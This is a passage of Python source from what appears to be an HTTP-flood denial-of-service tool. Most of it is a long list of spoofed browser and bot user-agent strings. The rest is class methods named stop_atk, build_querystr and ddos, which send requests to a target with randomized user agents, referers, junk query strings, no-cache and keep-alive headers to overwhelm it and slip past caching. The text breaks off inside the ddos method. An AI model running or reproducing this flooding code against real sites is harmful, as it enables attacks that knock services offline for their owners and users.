'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)',
'Links (2.1pre15; FreeBSD 5.4-STABLE i386; 158x58)', 'Wget/1.8.2',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0', 'Mediapartners-Google/2.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007 Firebird/0.7',
'Mozilla/4.04 [en] (WinNT; I)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060205 Galeon/2.0.0 (Debian package 2.0.0-2)',
'lwp-trivial/1.41', 'NetBSD-ftp/20031210', 'Dillo/0.8.5-i18n-misc',
'Links (2.1pre20; NetBSD 2.1_STABLE i386; 145x54)',
'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Lynx/2.8.5rel.3 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Links (2.1pre19; NetBSD 2.1_STABLE sparc64; 145x54)',
'Lynx/2.8.6dev.15 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d',
'Links (2.1pre14; IRIX64 6.5 IP27; 145x54)', 'Wget/1.10.1',
'ELinks/0.10.5 (textmode; FreeBSD 4.11-STABLE i386; 80x22-2)',
'Links (2.1pre20; FreeBSD 4.11-STABLE i386; 80x22)',
'Lynx/2.8.5rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d-p1', 'Opera/8.52 (X11; Linux i386; U; de)',
'Mozilla/5.0 (X11; U; NetBSD i386; en-US; rv:1.8.0.1) Gecko/20060310 Firefox/1.5.0.1',
'Mozilla/5.0 (X11; U; IRIX64 IP27; en-US; rv:1.4) Gecko/20030711',
'Mozilla/4.8 [en] (X11; U; IRIX64 6.5 IP27)', 'Mozilla/4.76 [en] (X11; U; SunOS 5.8 sun4m)',
'Opera/5.0 (SunOS 5.8 sun4m; U) [en]', 'Links (2.1pre15; SunOS 5.8 sun4m; 80x24)',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7d', 'Wget/1.8.1', 'Wget/1.9.1',
'tnftp/20050625', 'Links (1.00pre12; Linux 2.6.14.2.20051115 i686; 80x24) (Debian pkg 0.99+1.00pre12-1)',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.0.16',
'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7) Gecko/20051122', 'Wget/1.7',
'Lynx/2.8.2rel.1 libwww-FM/2.14', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; de) Opera 8.53',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7e',
'Links (2.1pre20; SunOS 5.10 sun4u; 80x22)',
'Lynx/2.8.5rel.5 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7i',
'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8) Gecko/20060202 Firefox/1.5',
'Opera/8.51 (X11; Linux i386; U; de)', 'Emacs-W3/4.0pre.46 URL/p4.0pre.46 (i386--freebsd; X11)',
'Links (0.96; OpenBSD 3.0 sparc)', 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.6c',
'Lynx/2.8.3rel.1 libwww-FM/2.14',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)', 'libwww-perl/5.79',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.12) Gecko/20050919 Firefox/1.0.7',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)',
'msnbot/1.0 (+http://search.msn.com/msnbot.htm)', 'Googlebot/2.1 (+http://www.google.com/bot.html)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051008 Firefox/1.0.7',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; en) Opera 8.51',
'Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.3 (like Gecko)',
'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7c',
'Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/4.8 [en] (Windows NT 5.1; U)', 'Opera/8.51 (Windows NT 5.1; U; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Opera/8.51 (Windows NT 5.1; U; en;VWP-online.de)',
'sproose/0.1-alpha (sproose crawler; http://www.sproose.com/bot.html; [email protected])',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0,gzip(gfe) (via translate.google.com)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'BrowserEmulator/0.9 see http://dejavu.org',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/125.2 (KHTML, like Gecko)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.4) Gecko/20030624',
'iCCrawler (http://www.iccenter.net/bot.htm)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)',
'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.12) Gecko/20051013 Debian/1.7.12-1ubuntu1',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de; rv:1.8) Gecko/20051111 Firefox/1.5',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:0.9.4.1) Gecko/20020508 Netscape6/6.2.3',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; de) Opera 8.50',
'Mozilla/3.0 (x86 [de] Windows NT 5.0; Sun)', 'Java/1.4.1_04',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8) Gecko/20051111 Firefox/1.5',
'msnbot/0.9 (+http://search.msn.com/msnbot.htm)',
'NutchCVS/0.8-dev (Nutch running at UW; http://www.nutch.org/docs/en/bot.html; [email protected])',
'Mozilla/4.0 compatible ZyBorg/1.0 ([email protected]; http://www.WISEnutbot.com)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; de) Opera 8.53',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.4) Gecko/20030619 Netscape/7.1 (ax)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows NT; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)', 'Mozilla/4.0 (compatible; MSIE 5.16; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows 95)',
'Mozilla/4.0 (compatible; MSIE 5.5; AOL 7.0; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)',
'Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)', 'Opera/8.53 (Windows NT 5.1; U; en)',
'Opera/8.01 (Windows NT 5.0; U; de)', 'Opera/8.54 (Windows NT 5.1; U; de)',
'Opera/8.53 (Windows NT 5.0; U; en)', 'Opera/8.01 (Windows NT 5.1; U; de)',
'Opera/8.50 (Windows NT 5.1; U; de)',
'Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322',
'Mozilla/4.0(compatible; MSIE 5.0; Windows 98; DigExt)',
'Mozilla/4.0 (compatible; Cerberian Drtrs Version-3.2-Build-0)',
'Mozilla/4.0 (compatible; AvantGo 6.0; FreeBSD)', 'Mozilla/4.5 [de] (Macintosh; I; PPC)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; .NET CLR 1.1.4322; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcIA; MPLUS)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {59FC8AE0-2D88-C929-DA8D-B559D01826E7}; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; snprtz|S04741035500914#914|isdn; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EnergyPlugIn; dial)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; iebar; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461; sbcydsl 3.12; YComp 5.0.0.0; YPC 3.2.0; .NET CLR 1.1.4322; yplus 5.1.02b)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; SV1; .NET CLR 1.0.3705)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Ringo; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.0.1; .NET CLR 1.1.4322; yplus 4.1.00b)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; YPC 3.2.0)',
'Mozilla/4.0 (compatible; MSIE 6.0; AOL 7.0; Windows NT 5.1; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; BUILDWARE 1.6; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; HbTools 4.7.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; YPC 3.2.0; (R1 1.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; X11; Linux i686; it)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Arcor 5.004; FunWebProducts; HbTools 4.7.5)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; en)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Tablet PC 1.7)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312469)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; SV1; FDM)',
'Mozilla/5.0 (Macintosh; U; PPC; de-DE; rv:1.0.2)', 'Mozilla/5.0 (Windows; U; Win98; de-DE; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1)',
'Mozilla/5.0 (compatible; Konqueror/3.4; Linux 2.6.14-kanotix-9; X11)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win98; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; de; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.7)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6)',
'Mozilla/5.0 (X11; U; Linux i686; de; rv:1.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.8.0.1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; de; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.7.12)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.8)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fi; rv:1.8.0.1)',
'Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.4.1)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr-FR; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; zh-TW; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.3)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.12)',
'Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; sl; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.0.1)', 'Mozilla/5.0 (X11; Linux i686; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7.2)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.6)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.7.6)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8a3)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-DE; rv:1.7.10)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de-AT; rv:1.7.12)',
'Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.5)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.8.0.1)',
'Mozilla/5.0 (compatible; Konqueror/3; Linux)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.8)',
'Mozilla/5.0 (compatible; Konqueror/3.2; Linux)', 'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; tg)',
'Mozilla/5.0 (X11; U; Linux i686; de-DE; rv:1.8b4)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51']
return user_agents
def stop_atk(self):
self.stopatk = True
def build_querystr(self, value):
result = ''
for i in range(value):
item = random.randint(65, 100)
result += chr(item)
return result
def ddos(self):
if not self.stopatk:
try:
code = 0
agent = random.choice(self.useragents)
req = urllib.request.Request(self.ip, headers={'User-Agent': agent,
'Referer': random.choice(
self.referers) + self.build_querystr(
random.randint(50, 100)),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Keep-Alive': random.randint(110, 160),
'Connection': 'keep-alive'})
urllib.request.urlopen(req)
code = 200
except urllib.error.HTTPError as e:
code_split = str(e).split()
code = code_split[2]
code = str(code[0] + code[1] + code[2])
if "500" in str(e):
code = 500
